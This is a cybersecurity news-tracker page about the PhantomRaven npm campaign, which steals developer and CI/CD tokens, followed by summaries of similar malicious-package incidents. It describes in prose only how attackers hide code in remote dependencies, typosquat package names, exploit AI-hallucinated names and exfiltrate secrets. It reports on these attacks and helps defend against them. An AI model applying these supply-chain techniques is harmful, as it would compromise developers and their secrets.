CyberHappenings logo
Home Browse About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

PhantomRaven npm credential harvesting campaign leverages invisible dependencies

First reported
Last updated
3 unique sources, 4 articles

Summary

Hide ▲

An ongoing npm credential harvesting campaign dubbed PhantomRaven has been active since August 2025. The malware steals npm tokens, GitHub credentials, and CI/CD secrets from developers worldwide. At least 126 npm packages have been infected, resulting in over 86,000 downloads. The attack uses Remote Dynamic Dependencies (RDD) to hide malicious code in externally hosted packages, evading npm security scans. The campaign exploits AI hallucinations to create plausible-sounding package names, a technique known as slopsquatting. As of October 30, 2025, the attacker-controlled URL can serve any kind of malware, initially serving harmless code before pushing a malicious version. The malware scans the developer environment for email addresses and gathers information about the CI/CD environment. The npm ecosystem allows easy publishing and low friction for packages, with lifecycle scripts executing arbitrary code at install time. As of October 29, 2025, at least 80 of the infected packages remain active. Researchers have discovered a malicious npm package named "@acitons/artifact" that typosquats the legitimate "@actions/artifact" package to target GitHub-owned repositories. The package incorporated a post-install hook to download and run malware in versions 4.0.12 to 4.0.17, and has been downloaded 47,405 times. The malware specifically targets repositories owned by the GitHub organization, indicating a targeted attack against GitHub.

Timeline

  1. 29.10.2025 16:00 4 articles · 13d ago

    PhantomRaven npm credential harvesting campaign discovered

    The campaign has been active since August 2025, infecting at least 126 npm packages with over 86,000 downloads. The attack uses Remote Dynamic Dependencies (RDD) to hide malicious code and exploits AI hallucinations to create plausible-sounding package names. The malware collects tokens for NPM, GitHub Actions, GitLab, Jenkins, and CircleCI. The campaign uses three data exfiltration methods: HTTP GET requests, HTTP POST requests, and WebSocket connections. The malware profiles the infected device to determine the target’s value and searches for email addresses in environment variables. As of October 30, 2025, the attacker-controlled URL can serve any kind of malware, initially serving harmless code before pushing a malicious version. The malware scans the developer environment for email addresses and gathers information about the CI/CD environment. The npm ecosystem allows easy publishing and low friction for packages, with lifecycle scripts executing arbitrary code at install time. As of October 29, 2025, at least 80 of the infected packages remain active. Researchers have discovered a malicious npm package named "@acitons/artifact" that typosquats the legitimate "@actions/artifact" package to target GitHub-owned repositories. The package incorporated a post-install hook to download and run malware in versions 4.0.12 to 4.0.17, and has been downloaded 47,405 times. The malware specifically targets repositories owned by the GitHub organization, indicating a targeted attack against GitHub. Another npm package named "8jfiesaf83" with similar functionality was identified but is no longer available for download, with 1,016 downloads recorded.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Malicious npm packages targeting Windows, macOS, and Linux systems

Ten malicious npm packages were discovered that deliver an information stealer targeting Windows, macOS, and Linux systems. The packages, uploaded to the npm registry on July 4, 2025, have collectively accumulated over 9,900 downloads. The malware uses multiple layers of obfuscation and a fake CAPTCHA to evade detection and harvests credentials from system keyrings, browsers, and authentication services. The packages are still available on npm despite being reported to npm. The attack aims to steal sensitive information, including credentials and session cookies, which can provide unauthorized access to corporate resources.

Open in new tab

GlassWorm malware targets OpenVSX, VS Code registries

The GlassWorm malware campaign has resurfaced on OpenVSX with three new VSCode extensions, downloaded over 10,000 times. The malware uses invisible Unicode characters to hide malicious code and targets GitHub, NPM, and OpenVSX account credentials, as well as cryptocurrency wallet data. The campaign initially impacted 49 extensions, with an estimated 35,800 downloads, though this figure includes inflated numbers due to bots and visibility-boosting tactics. The Eclipse Foundation has revoked leaked tokens and introduced security measures, but the threat actors have pivoted to GitHub and now returned to OpenVSX with updated command-and-control endpoints. The malware's global reach includes systems in the United States, South America, Europe, Asia, and a government entity in the Middle East. Koi Security has accessed the attackers' server and shared victim data with law enforcement. The threat actors have posted a fresh transaction to the Solana blockchain, providing an updated C2 endpoint for downloading the next-stage payload. The attacker's server was inadvertently exposed, revealing a partial list of victims spanning the U.S., South America, Europe, and Asia, including a major government entity from the Middle East. The threat actor is assessed to be Russian-speaking and uses the open-source browser extension C2 framework named RedExt as part of their infrastructure.

Open in new tab

Credential Phishing Campaign Using 175 Malicious npm Packages

A credential phishing campaign, codenamed Beamglea, has targeted over 135 industrial, technology, and energy companies worldwide. The campaign utilized 175 malicious npm packages, collectively downloaded 26,000 times, to host redirect scripts that lead victims to credential harvesting pages. The packages exploit npm's public registry and UNPKG's CDN to distribute HTML payloads designed to capture Microsoft credentials. The campaign leverages legitimate infrastructure to create a resilient phishing operation that is difficult to detect and mitigate. The packages do not execute malicious code upon installation, making them harder to identify. The HTML files, disguised as legitimate documents, redirect victims to phishing sites that pre-fill email fields, increasing the likelihood of successful credential theft.

Open in new tab

Malicious 'postmark-mcp' npm package exfiltrated user emails

An unofficial npm package named 'postmark-mcp' silently stole users' emails after a malicious update. The package, which mimicked the official 'postmark-mcp' project, added a line of code in version 1.0.16 to exfiltrate email communications to an external address. The malicious version was available for a week and recorded around 1,643 downloads, potentially exposing sensitive information. The package was used to interface AI assistants with the Postmark email delivery platform, allowing them to send emails on behalf of users or apps. The malicious functionality could have exposed personal communications, password reset requests, two-factor authentication codes, financial information, and customer details. Users who downloaded the package are advised to remove it immediately, rotate potentially exposed credentials, and audit all MCP servers in use. The malicious package was deleted by the developer 'phanpak' after being contacted, who maintains 31 other packages on npm. Researchers at Koi Security discovered the malicious package, which contained a single line of code that BCC'd all emails to the threat actor. The risk could be widespread, with some 1,500 organizations potentially downloading the malicious package. The developer removed the malicious package from npm after being contacted by Koi Security.

Open in new tab

AI-Enhanced Malware Campaign Targeting Multiple Sectors

The AI-enhanced malware campaign, dubbed EvilAI, continues to target organizations globally, with infections confirmed in multiple regions including Europe, the Americas, and the Asia, Middle East, and Africa (AMEA) region. The malware, disguised as legitimate productivity and AI-enhanced apps, has infected hundreds of victims across manufacturing, government, healthcare, technology, and retail sectors. The campaign uses various propagation methods, including newly registered websites, malicious ads, SEO manipulation, and promoted download links on forums and social media. The malware performs extensive reconnaissance, disables security products, and uses obfuscation techniques to avoid detection, acting as an initial access broker for future exploit activity. The campaign, first identified in September 2025, has been observed using AI tools to distribute malware. The malware is concealed within seemingly legitimate apps, leveraging digital signatures and realistic features to evade detection. The threat actors behind the campaign are highly capable, using sophisticated techniques to make the malware appear authentic. The malware uses NeutralinoJS to execute JavaScript code and siphon sensitive data, employing Unicode homoglyphs to bypass detection. The presence of multiple code-signing publishers suggests a shared malware-as-a-service provider or a code-signing marketplace.

Open in new tab